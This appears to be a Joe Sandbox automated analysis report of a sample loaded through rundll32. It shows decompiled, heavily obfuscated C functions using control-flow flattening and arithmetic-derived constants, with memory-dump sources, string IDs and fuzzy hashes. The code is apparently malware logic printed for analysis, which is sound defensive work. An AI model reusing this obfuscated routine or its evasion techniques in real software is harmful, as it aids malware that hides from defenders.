                                                                                                                                    				_v76 = _v76 << 0xf;
                                                                                                                                    				_v76 = _v76 + 0x73e5;
                                                                                                                                    				_v76 = _v76 ^ 0x42f7f56f;
                                                                                                                                    				_v52 = 0x46ab19;
                                                                                                                                    				_v52 = _v52 << 0xd;
                                                                                                                                    				_t228 = 0xe611c04;
                                                                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                                                                    				_t223 = 0x66;
                                                                                                                                    				_v52 = _v52 / _t223;
                                                                                                                                    				_v52 = _v52 ^ 0x0211beab;
                                                                                                                                    				_v80 = 0x97c948;
                                                                                                                                    				_v80 = _v80 ^ 0xfb972484;
                                                                                                                                    				_v80 = _v80 << 2;
                                                                                                                                    				_v80 = _v80 << 0xf;
                                                                                                                                    				_v80 = _v80 ^ 0xdb950905;
                                                                                                                                    				_v44 = 0x96980f;
                                                                                                                                    				_v44 = _v44 ^ 0xfeb8bb56;
                                                                                                                                    				_v44 = _v44 ^ 0xfe2f3013;
                                                                                                                                    				_v64 = 0x454cfa;
                                                                                                                                    				_v64 = _v64 ^ 0x45fe36ac;
                                                                                                                                    				_t224 = 0x43;
                                                                                                                                    				_v64 = _v64 / _t224;
                                                                                                                                    				_v64 = _v64 ^ 0x010b84d0;
                                                                                                                                    				_v68 = 0xb73a82;
                                                                                                                                    				_v68 = _v68 | 0xd419dac3;
                                                                                                                                    				_t225 = 0x23;
                                                                                                                                    				_v68 = _v68 / _t225;
                                                                                                                                    				_v68 = _v68 ^ 0x061f1f3c;
                                                                                                                                    				_v60 = 0xe80863;
                                                                                                                                    				_v60 = _v60 * 7;
                                                                                                                                    				_v60 = _v60 ^ 0x88fb80a0;
                                                                                                                                    				_v60 = _v60 ^ 0x8ea007f2;
                                                                                                                                    				_v40 = 0x80f530;
                                                                                                                                    				_v40 = _v40 ^ 0xcef24483;
                                                                                                                                    				_v40 = _v40 ^ 0xce7935e2;
                                                                                                                                    				_v92 = 0x233377;
                                                                                                                                    				_v92 = _v92 ^ 0x61e14959;
                                                                                                                                    				_v92 = _v92 + 0xffffa5e4;
                                                                                                                                    				_v92 = _v92 + 0xf94b;
                                                                                                                                    				_v92 = _v92 ^ 0x61c7ad44;
                                                                                                                                    				_v88 = 0xbad9cc;
                                                                                                                                    				_v88 = _v88 | 0x5a2a09a8;
                                                                                                                                    				_v88 = _v88 * 0x2f;
                                                                                                                                    				_v88 = _v88 | 0xecc1c683;
                                                                                                                                    				_v88 = _v88 ^ 0xecc3849f;
                                                                                                                                    				_v56 = 0xb0d301;
                                                                                                                                    				_v56 = _v56 + 0xa0bb;
                                                                                                                                    				_v56 = _v56 << 0xf;
                                                                                                                                    				_v56 = _v56 ^ 0xb9db0742;
                                                                                                                                    				_v36 = 0xab48cf;
                                                                                                                                    				_v36 = _v36 * 0x24;
                                                                                                                                    				_v36 = _v36 ^ 0x1811952a;
                                                                                                                                    				_v84 = 0x104632;
                                                                                                                                    				_v84 = _v84 + 0x4a21;
                                                                                                                                    				_v84 = _v84 ^ 0x8dbd106a;
                                                                                                                                    				_v84 = _v84 + 0xfe54;
                                                                                                                                    				_v84 = _v84 ^ 0x8daed025;
                                                                                                                                    				_t226 = _v4;
                                                                                                                                    				_t197 = _v8;
                                                                                                                                    				_t230 = _v8;
                                                                                                                                    				_v72 = 0x1611ea;
                                                                                                                                    				_v72 = _v72 ^ 0xe055e86d;
                                                                                                                                    				_v72 = _v72 >> 0xd;
                                                                                                                                    				_v72 = _v72 >> 5;
                                                                                                                                    				_v72 = _v72 ^ 0x0003993e;
                                                                                                                                    				_v32 = 0x799484;
                                                                                                                                    				_v32 = _v32 ^ 0xb4488d59;
                                                                                                                                    				_v32 = _v32 ^ 0xb439947f;
                                                                                                                                    				L1:
                                                                                                                                    				while(1) {
                                                                                                                                    					do {
                                                                                                                                    						while(_t228 != 0x5161e0c) {
                                                                                                                                    							if(_t228 == 0xb95f952) {
                                                                                                                                    								_t229 = E002DC032( &_v16, _t198, _t184, _t230, _v44, _v64, _v68);
                                                                                                                                    								_t231 =  &(_t231[5]);
                                                                                                                                    								_v20 = _t229;
                                                                                                                                    								if(_t229 == 0) {
                                                                                                                                    									L18:
                                                                                                                                    									E002D8519(_v72, _v32, _t197);
                                                                                                                                    								} else {
                                                                                                                                    									_t204 = _v16;
                                                                                                                                    									if(_t204 == 0) {
                                                                                                                                    										L17:
                                                                                                                                    										if(_t229 != 0) {
                                                                                                                                    											_t189 = _v8;
                                                                                                                                    											 *_t189 = _t197;
                                                                                                                                    											 *((intOrPtr*)(_t189 + 4)) = _t226 - _t230;
                                                                                                                                    										} else {
                                                                                                                                    											goto L18;
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										_v48 = _v48 + _t204;
                                                                                                                                    										_t230 = _t230 - _t204;
                                                                                                                                    										if(_t230 != 0) {
                                                                                                                                    											L10:
                                                                                                                                    											_t184 = _v48;
                                                                                                                                    											L11:
                                                                                                                                    											_t198 = _v24;
                                                                                                                                    											_t228 = 0xb95f952;
                                                                                                                                    											continue;
                                                                                                                                    										} else {
                                                                                                                                    											_t205 = _t226 + _t226;
                                                                                                                                    											_push(_t205);
                                                                                                                                    											_push(_t205);
                                                                                                                                    											_v12 = _t205;
                                                                                                                                    											_t193 = E002C7FF2(_t205);
                                                                                                                                    											_v48 = _t193;
                                                                                                                                    											if(_t193 == 0) {
                                                                                                                                    												goto L17;
                                                                                                                                    											} else {
                                                                                                                                    												E002CED7E(_v88, _t193, _v56, _t197, _t226);
                                                                                                                                    												E002D8519(_v36, _v84, _t197);
                                                                                                                                    												_t197 = _v48;
                                                                                                                                    												_t230 = _t226;
                                                                                                                                    												_t231 =  &(_t231[4]);
                                                                                                                                    												_t196 = _t197 + _t226;
                                                                                                                                    												_t226 = _v12;
                                                                                                                                    												_v48 = _t196;
                                                                                                                                    												if(_t230 == 0) {
                                                                                                                                    													goto L17;
                                                                                                                                    												} else {
                                                                                                                                    													goto L10;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								if(_t228 != 0xe611c04) {
                                                                                                                                    									goto L15;
                                                                                                                                    								} else {
                                                                                                                                    									_t228 = 0x5161e0c;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    							L20:
                                                                                                                                    							return _t229;
                                                                                                                                    						}
                                                                                                                                    						_t226 = 0x10000;
                                                                                                                                    						_push(_t198);
                                                                                                                                    						_push(_t198);
                                                                                                                                    						_t184 = E002C7FF2(0x10000);
                                                                                                                                    						_t197 = _t184;
                                                                                                                                    						if(_t197 == 0) {
                                                                                                                                    							_t198 = _v24;
                                                                                                                                    							_t228 = 0xa3056fc;
                                                                                                                                    							goto L15;
                                                                                                                                    						} else {
                                                                                                                                    							_v48 = _t184;
                                                                                                                                    							_t230 = 0x10000;
                                                                                                                                    							goto L11;
                                                                                                                                    						}
                                                                                                                                    						goto L20;
                                                                                                                                    						L15:
                                                                                                                                    						_t184 = _v48;
                                                                                                                                    					} while (_t228 != 0xa3056fc);
                                                                                                                                    					_t229 = _v20;
                                                                                                                                    					goto L17;
                                                                                                                                    				}
                                                                                                                                    			}










































                                                                                                                                    0x002da665
                                                                                                                                    0x002da665
                                                                                                                                    0x002da5f5
                                                                                                                                    0x002da604
                                                                                                                                    0x002da605
                                                                                                                                    0x002da606
                                                                                                                                    0x002da60b
                                                                                                                                    0x002da611
                                                                                                                                    0x002da61b
                                                                                                                                    0x002da61f
                                                                                                                                    0x00000000
                                                                                                                                    0x002da613
                                                                                                                                    0x002da613
                                                                                                                                    0x002da617
                                                                                                                                    0x00000000
                                                                                                                                    0x002da617
                                                                                                                                    0x00000000
                                                                                                                                    0x002da624
                                                                                                                                    0x002da624
                                                                                                                                    0x002da628
                                                                                                                                    0x002da634
                                                                                                                                    0x00000000
                                                                                                                                    0x002da634

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: !J$YIa$mU$s
                                                                                                                                    • API String ID: 0-3335770892
                                                                                                                                    • Opcode ID: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                    • Instruction ID: 2228eeb8b4a18513f98cf01e3d6cb9dc0d8863b7204a16570b49b4143d80e264
                                                                                                                                    • Opcode Fuzzy Hash: a2c96b5523714fc353019ef791256b388c8b4530006014acc88a687be62f7107
                                                                                                                                    • Instruction Fuzzy Hash: 79914EB19193819BC354CF29D18580BFBF0BBC5B58F548A1EF99597260D3B4DA188F83
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002C4EE3(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				intOrPtr _v88;
                                                                                                                                    				char _v608;
                                                                                                                                    				void* _t203;
                                                                                                                                    				void* _t204;
                                                                                                                                    				void* _t207;
                                                                                                                                    				signed int _t212;
                                                                                                                                    				signed int _t213;
                                                                                                                                    				signed int _t214;
                                                                                                                                    				signed int _t215;
                                                                                                                                    				intOrPtr _t216;
                                                                                                                                    				void* _t221;
                                                                                                                                    
                                                                                                                                    				_v84 = _v84 & 0x00000000;
                                                                                                                                    				_v88 = 0xf9097a;
                                                                                                                                    				_v32 = 0xbcbe1d;
                                                                                                                                    				_v32 = _v32 << 9;
                                                                                                                                    				_v32 = _v32 << 9;
                                                                                                                                    				_v32 = _v32 << 0xb;
                                                                                                                                    				_v32 = _v32 ^ 0xa0062323;
                                                                                                                                    				_v16 = 0x782140;
                                                                                                                                    				_v16 = _v16 + 0xfffffe34;
                                                                                                                                    				_v16 = _v16 + 0xfffffe18;
                                                                                                                                    				_v16 = _v16 << 0xa;
                                                                                                                                    				_v16 = _v16 ^ 0xe0701d9a;
                                                                                                                                    				_v40 = 0x7af846;
                                                                                                                                    				_v40 = _v40 + 0xffff28b3;
                                                                                                                                    				_v40 = _v40 << 0xd;
                                                                                                                                    				_v40 = _v40 + 0xffffd351;
                                                                                                                                    				_v40 = _v40 ^ 0x441384bc;
                                                                                                                                    				_v68 = 0xebfd4;
                                                                                                                                    				_v68 = _v68 + 0xffff2b98;
                                                                                                                                    				_t212 = 0x4b;
                                                                                                                                    				_v68 = _v68 / _t212;
                                                                                                                                    				_v68 = _v68 ^ 0x000f3184;
                                                                                                                                    				_v48 = 0x77c678;
                                                                                                                                    				_t213 = 0x72;
                                                                                                                                    				_v48 = _v48 * 0x4d;
                                                                                                                                    				_v48 = _v48 + 0x6b8c;
                                                                                                                                    				_v48 = _v48 ^ 0x240efbe4;
                                                                                                                                    				_v24 = 0xae1064;
                                                                                                                                    				_v24 = _v24 / _t213;
                                                                                                                                    				_v24 = _v24 << 7;
                                                                                                                                    				_v24 = _v24 ^ 0x1be7fa9d;
                                                                                                                                    				_v24 = _v24 ^ 0x1b226397;
                                                                                                                                    				_v72 = 0x44bde7;
                                                                                                                                    				_v72 = _v72 | 0x5f63ee23;
                                                                                                                                    				_v72 = _v72 ^ 0x5f6de837;
                                                                                                                                    				_v56 = 0x5a94a4;
                                                                                                                                    				_v56 = _v56 >> 9;
                                                                                                                                    				_t214 = 0xc;
                                                                                                                                    				_v56 = _v56 * 0x2a;
                                                                                                                                    				_v56 = _v56 ^ 0x0003dc1b;
                                                                                                                                    				_v8 = 0x2a4d30;
                                                                                                                                    				_v8 = _v8 + 0xff2b;
                                                                                                                                    				_v8 = _v8 | 0x9a82811b;
                                                                                                                                    				_v8 = _v8 << 0xc;
                                                                                                                                    				_v8 = _v8 ^ 0xbcdbc31f;
                                                                                                                                    				_v64 = 0xa41a91;
                                                                                                                                    				_v64 = _v64 | 0x62aa1889;
                                                                                                                                    				_v64 = _v64 << 0xd;
                                                                                                                                    				_v64 = _v64 ^ 0xc357e7aa;
                                                                                                                                    				_v36 = 0x90fe9;
                                                                                                                                    				_v36 = _v36 >> 0xa;
                                                                                                                                    				_v36 = _v36 | 0x57d87c49;
                                                                                                                                    				_v36 = _v36 / _t214;
                                                                                                                                    				_v36 = _v36 ^ 0x0755636a;
                                                                                                                                    				_v28 = 0x5fda7e;
                                                                                                                                    				_v28 = _v28 + 0xffff2d0f;
                                                                                                                                    				_v28 = _v28 << 0xa;
                                                                                                                                    				_v28 = _v28 + 0xdffb;
                                                                                                                                    				_v28 = _v28 ^ 0x7c1a8a5e;
                                                                                                                                    				_v20 = 0xaf632f;
                                                                                                                                    				_v20 = _v20 >> 8;
                                                                                                                                    				_v20 = _v20 << 9;
                                                                                                                                    				_v20 = _v20 >> 0xf;
                                                                                                                                    				_v20 = _v20 ^ 0x0003fa93;
                                                                                                                                    				_v12 = 0x960758;
                                                                                                                                    				_v12 = _v12 ^ 0x64ee01f0;
                                                                                                                                    				_v12 = _v12 | 0x3d3dd2ba;
                                                                                                                                    				_v12 = _v12 << 7;
                                                                                                                                    				_v12 = _v12 ^ 0xbeed48c5;
                                                                                                                                    				_v80 = 0xba0fdf;
                                                                                                                                    				_v80 = _v80 + 0xfd2d;
                                                                                                                                    				_v80 = _v80 ^ 0x00b93168;
                                                                                                                                    				_v60 = 0x5f834c;
                                                                                                                                    				_v60 = _v60 ^ 0x963b7b6a;
                                                                                                                                    				_t215 = 0x3f;
                                                                                                                                    				_v60 = _v60 * 0x3e;
                                                                                                                                    				_v60 = _v60 ^ 0x6c73d449;
                                                                                                                                    				_v76 = 0x4b89c6;
                                                                                                                                    				_v76 = _v76 >> 6;
                                                                                                                                    				_v76 = _v76 ^ 0x0008f57a;
                                                                                                                                    				_v52 = 0x3d488e;
                                                                                                                                    				_v52 = _v52 << 6;
                                                                                                                                    				_v52 = _v52 << 8;
                                                                                                                                    				_v52 = _v52 ^ 0x5226582a;
                                                                                                                                    				_v44 = 0x8cf369;
                                                                                                                                    				_v44 = _v44 ^ 0x25329c0c;
                                                                                                                                    				_v44 = _v44 / _t215;
                                                                                                                                    				_v44 = _v44 >> 0xe;
                                                                                                                                    				_v44 = _v44 ^ 0x0005c7da;
                                                                                                                                    				_t216 =  *0x2e3e10; // 0x0
                                                                                                                                    				_t203 = E002CB6CF(_t216 + 0x1c, _v32, _v16, _v40);
                                                                                                                                    				_t241 = _a4 + 0x2c;
                                                                                                                                    				_t204 = E002CB23C(_v68, _v48, _a4 + 0x2c, _v24, _v72, _t203);
                                                                                                                                    				_t248 = _t204;
                                                                                                                                    				if(_t204 != 0) {
                                                                                                                                    					_push(_v64);
                                                                                                                                    					_push(_v8);
                                                                                                                                    					_t207 = E002DDCF7(_v56, 0x2c1000, _t248);
                                                                                                                                    					_pop(_t221);
                                                                                                                                    					E002C47CE( *((intOrPtr*)(_a8 + 0x18)), _v36, _t221, _v28, _v20, _t207, _t241, _v12, _v80);
                                                                                                                                    					E002CA8B0(_v60, _t207, _v76);
                                                                                                                                    					E002D1F8A(_v52, _v44,  &_v608);
                                                                                                                                    				}
                                                                                                                                    				return 1;
                                                                                                                                    			}



































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcmpi
                                                                                                                                    • String ID: *X&R$0M*$7m_$@!x
                                                                                                                                    • API String ID: 1586166983-4050865940
                                                                                                                                    • Opcode ID: 699d9be608e25a5824adeeeb4e5b82ea178424b62761b0b15403d355b39969bd
                                                                                                                                    • Instruction ID: a5ad7f5ddcdd070f514813fb596486a7abdfeb25934b05bfd11d30dcf6da7ca2
                                                                                                                                    • Opcode Fuzzy Hash: 699d9be608e25a5824adeeeb4e5b82ea178424b62761b0b15403d355b39969bd
                                                                                                                                    • Instruction Fuzzy Hash: 7D811272C0121DAFCF49DFA1D88A9EEBBB1FB44318F208118E411B6260D7B45A5ACF94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002CEA99(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				void* _t136;
                                                                                                                                    				signed int _t147;
                                                                                                                                    				void* _t150;
                                                                                                                                    				intOrPtr* _t152;
                                                                                                                                    				void* _t154;
                                                                                                                                    				void* _t165;
                                                                                                                                    				signed int _t166;
                                                                                                                                    				signed int _t167;
                                                                                                                                    				signed int* _t171;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t152 = __edx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t136);
                                                                                                                                    				_v52 = 0x4b44d9;
                                                                                                                                    				_t171 =  &(( &_v68)[6]);
                                                                                                                                    				_t165 = 0;
                                                                                                                                    				_t154 = 0x40ad1f2;
                                                                                                                                    				_t166 = 0x41;
                                                                                                                                    				_v52 = _v52 * 0x5c;
                                                                                                                                    				_v52 = _v52 ^ 0xd486af61;
                                                                                                                                    				_v52 = _v52 ^ 0xcf8a129f;
                                                                                                                                    				_v24 = 0x8b17cc;
                                                                                                                                    				_v24 = _v24 + 0xffff02b5;
                                                                                                                                    				_v24 = _v24 ^ 0x008a1a91;
                                                                                                                                    				_v64 = 0xcc4e1;
                                                                                                                                    				_v64 = _v64 ^ 0x71537a57;
                                                                                                                                    				_v64 = _v64 | 0xbc84d226;
                                                                                                                                    				_v64 = _v64 + 0x8a58;
                                                                                                                                    				_v64 = _v64 ^ 0xbde0890e;
                                                                                                                                    				_v12 = 0x10173e;
                                                                                                                                    				_v12 = _v12 / _t166;
                                                                                                                                    				_v12 = _v12 ^ 0x000bb2e7;
                                                                                                                                    				_v16 = 0xcbf18d;
                                                                                                                                    				_v16 = _v16 + 0x7f8c;
                                                                                                                                    				_v16 = _v16 ^ 0x00cd0dea;
                                                                                                                                    				_v20 = 0x7a67ce;
                                                                                                                                    				_v20 = _v20 << 1;
                                                                                                                                    				_v20 = _v20 ^ 0x00fa626e;
                                                                                                                                    				_v68 = 0x7779f8;
                                                                                                                                    				_v68 = _v68 + 0xa85e;
                                                                                                                                    				_v68 = _v68 << 0x10;
                                                                                                                                    				_v68 = _v68 >> 3;
                                                                                                                                    				_v68 = _v68 ^ 0x0443aeb4;
                                                                                                                                    				_v28 = 0xee6391;
                                                                                                                                    				_v28 = _v28 ^ 0x2bfa2339;
                                                                                                                                    				_v28 = _v28 ^ 0x2b1bacd2;
                                                                                                                                    				_v32 = 0x87b642;
                                                                                                                                    				_v32 = _v32 + 0xffff3baa;
                                                                                                                                    				_v32 = _v32 ^ 0x008fda80;
                                                                                                                                    				_v36 = 0x3b697f;
                                                                                                                                    				_v36 = _v36 | 0x5675f49c;
                                                                                                                                    				_v36 = _v36 ^ 0x5679bffa;
                                                                                                                                    				_v40 = 0x254a84;
                                                                                                                                    				_v40 = _v40 * 0x67;
                                                                                                                                    				_v40 = _v40 ^ 0x0f0bd396;
                                                                                                                                    				_v44 = 0xfc206d;
                                                                                                                                    				_v44 = _v44 * 0x45;
                                                                                                                                    				_v44 = _v44 ^ 0x43f6aa11;
                                                                                                                                    				_v56 = 0x3dd941;
                                                                                                                                    				_v56 = _v56 ^ 0x94d2d45c;
                                                                                                                                    				_v56 = _v56 >> 9;
                                                                                                                                    				_v56 = _v56 ^ 0x00419011;
                                                                                                                                    				_v4 = 0xdcf5c3;
                                                                                                                                    				_v4 = _v4 ^ 0x0d464ae6;
                                                                                                                                    				_v4 = _v4 ^ 0x0d938ce3;
                                                                                                                                    				_v60 = 0xe23f0;
                                                                                                                                    				_v60 = _v60 ^ 0x0435e191;
                                                                                                                                    				_v60 = _v60 ^ 0xbde67646;
                                                                                                                                    				_v60 = _v60 ^ 0xb922f804;
                                                                                                                                    				_v60 = _v60 ^ 0x00f2260b;
                                                                                                                                    				_v8 = 0x523a90;
                                                                                                                                    				_v8 = _v8 * 0x75;
                                                                                                                                    				_v8 = _v8 ^ 0x259e6962;
                                                                                                                                    				_v48 = 0x46565e;
                                                                                                                                    				_t167 = 3;
                                                                                                                                    				_v48 = _v48 * 0x6a;
                                                                                                                                    				_t168 = _v4;
                                                                                                                                    				_v48 = _v48 / _t167;
                                                                                                                                    				_v48 = _v48 ^ 0x09b4f31e;
                                                                                                                                    				do {
                                                                                                                                    					while(_t154 != 0x40ad1f2) {
                                                                                                                                    						if(_t154 == 0x458d12f) {
                                                                                                                                    							_t147 = E002C8F65(_v12, _v16, _a12, _v20, _v24, _t154, _v64, _v68, _v52, _v28, _t154, 0);
                                                                                                                                    							_t168 = _t147;
                                                                                                                                    							_t171 =  &(_t171[0xa]);
                                                                                                                                    							if(_t147 != 0xffffffff) {
                                                                                                                                    								_t154 = 0x4af2a99;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						} else {
                                                                                                                                    							if(_t154 == 0x4af2a99) {
                                                                                                                                    								_t150 = E002C19B8(_t154, _v36,  *((intOrPtr*)(_t152 + 4)), _v40, _t168, _v44, _v56, _t152 + 4,  *_t152);
                                                                                                                                    								_t171 =  &(_t171[8]);
                                                                                                                                    								_t165 = _t150;
                                                                                                                                    								_t154 = 0xe5b5021;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t154 != 0xe5b5021) {
                                                                                                                                    									goto L11;
                                                                                                                                    								} else {
                                                                                                                                    									E002D1E67(_v4, _v60, _v8, _v48, _t168);
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L6:
                                                                                                                                    						return _t165;
                                                                                                                                    					}
                                                                                                                                    					_t154 = 0x458d12f;
                                                                                                                                    					L11:
                                                                                                                                    				} while (_t154 != 0xd2f352d);
                                                                                                                                    				goto L6;
                                                                                                                                    			}


                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: -5/$WzSq$^VF$JF
                                                                                                                                    • API String ID: 0-2399144359
                                                                                                                                    • Opcode ID: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                    • Instruction ID: 05d5c2d4ed33cc8180f91bceba080de7ae86e4c9701e0d4110b4d6b886b203f6
                                                                                                                                    • Opcode Fuzzy Hash: 1a99258aef2ebd0cedbce0666f862dafcadd34ac8b3dd1b99f29c3393997e72b
                                                                                                                                    • Instruction Fuzzy Hash: CD7132710183419BCB58CF65C98691BBBF2FBC8758F104A1DF29696220C3B1DA58CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002D9BCF() {
                                                                                                                                    				char _v520;
                                                                                                                                    				signed int _v524;
                                                                                                                                    				signed int _v528;
                                                                                                                                    				signed int _v532;
                                                                                                                                    				signed int _v536;
                                                                                                                                    				unsigned int _v540;
                                                                                                                                    				signed int _v544;
                                                                                                                                    				signed int _v548;
                                                                                                                                    				signed int _v552;
                                                                                                                                    				signed int _v556;
                                                                                                                                    				signed int _v560;
                                                                                                                                    				signed int _v564;
                                                                                                                                    				signed int _v568;
                                                                                                                                    				signed int _t111;
                                                                                                                                    				signed int _t115;
                                                                                                                                    				signed int _t117;
                                                                                                                                    				void* _t118;
                                                                                                                                    				signed int _t132;
                                                                                                                                    				void* _t134;
                                                                                                                                    				signed int _t135;
                                                                                                                                    				signed int* _t136;
                                                                                                                                    
                                                                                                                                    				_t136 =  &_v568;
                                                                                                                                    				_v560 = 0x297e3c;
                                                                                                                                    				_v560 = _v560 >> 9;
                                                                                                                                    				_t118 = 0x4ead2fe;
                                                                                                                                    				_v560 = _v560 + 0xe8be;
                                                                                                                                    				_v560 = _v560 ^ 0xc9c09221;
                                                                                                                                    				_v560 = _v560 ^ 0xc9c20db8;
                                                                                                                                    				_v540 = 0x190e1d;
                                                                                                                                    				_v540 = _v540 >> 7;
                                                                                                                                    				_v540 = _v540 >> 0xd;
                                                                                                                                    				_v540 = _v540 ^ 0x000cdd3b;
                                                                                                                                    				_v544 = 0x86c2f0;
                                                                                                                                    				_v544 = _v544 | 0x0d7eac20;
                                                                                                                                    				_v544 = _v544 ^ 0xe6b61282;
                                                                                                                                    				_v544 = _v544 ^ 0xeb41e563;
                                                                                                                                    				_v552 = 0x262f60;
                                                                                                                                    				_v552 = _v552 ^ 0x76c91adc;
                                                                                                                                    				_v552 = _v552 + 0xd1c5;
                                                                                                                                    				_v552 = _v552 ^ 0x76fc323e;
                                                                                                                                    				_v524 = 0xf427e0;
                                                                                                                                    				_v524 = _v524 + 0xffff22a3;
                                                                                                                                    				_v524 = _v524 ^ 0x00f85f52;
                                                                                                                                    				_v548 = 0xdbc1a5;
                                                                                                                                    				_v548 = _v548 >> 0xb;
                                                                                                                                    				_v548 = _v548 + 0xf615;
                                                                                                                                    				_v548 = _v548 ^ 0x0006ff3e;
                                                                                                                                    				_v556 = 0xd2f840;
                                                                                                                                    				_v556 = _v556 * 0x5f;
                                                                                                                                    				_t134 = 0;
                                                                                                                                    				_v556 = _v556 ^ 0x4e4cccaa;
                                                                                                                                    				_v568 = 0x74ecfa;
                                                                                                                                    				_t132 = 0x53;
                                                                                                                                    				_t133 = _v556;
                                                                                                                                    				_v568 = _v568 / _t132;
                                                                                                                                    				_v568 = _v568 ^ 0xc72664ff;
                                                                                                                                    				_v568 = _v568 << 0xf;
                                                                                                                                    				_v568 = _v568 ^ 0x862d9f40;
                                                                                                                                    				_v536 = 0xc0d44a;
                                                                                                                                    				_v536 = _v536 + 0x396d;
                                                                                                                                    				_t135 = _v556;
                                                                                                                                    				_t117 = _v556;
                                                                                                                                    				_v536 = _v536 * 0x46;
                                                                                                                                    				_v536 = _v536 ^ 0x34c6c601;
                                                                                                                                    				_v532 = 0xf37e83;
                                                                                                                                    				_v532 = _v532 << 8;
                                                                                                                                    				_v532 = _v532 | 0x760e0a19;
                                                                                                                                    				_v532 = _v532 ^ 0xf77c332a;
                                                                                                                                    				_v528 = 0x91f8e3;
                                                                                                                                    				_v528 = _v528 ^ 0xc904aca2;
                                                                                                                                    				_v528 = _v528 ^ 0xc9900919;
                                                                                                                                    				do {
                                                                                                                                    					while(_t118 != 0x27fe330) {
                                                                                                                                    						if(_t118 == 0x4ead2fe) {
                                                                                                                                    							_t118 = 0x96d401d;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t118 == 0x7ac597b) {
                                                                                                                                    								_t117 = E002CB6CF( &_v520, _v548, _v556, _v568);
                                                                                                                                    								_t118 = 0xa7595e6;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t118 == 0x80b0e4e) {
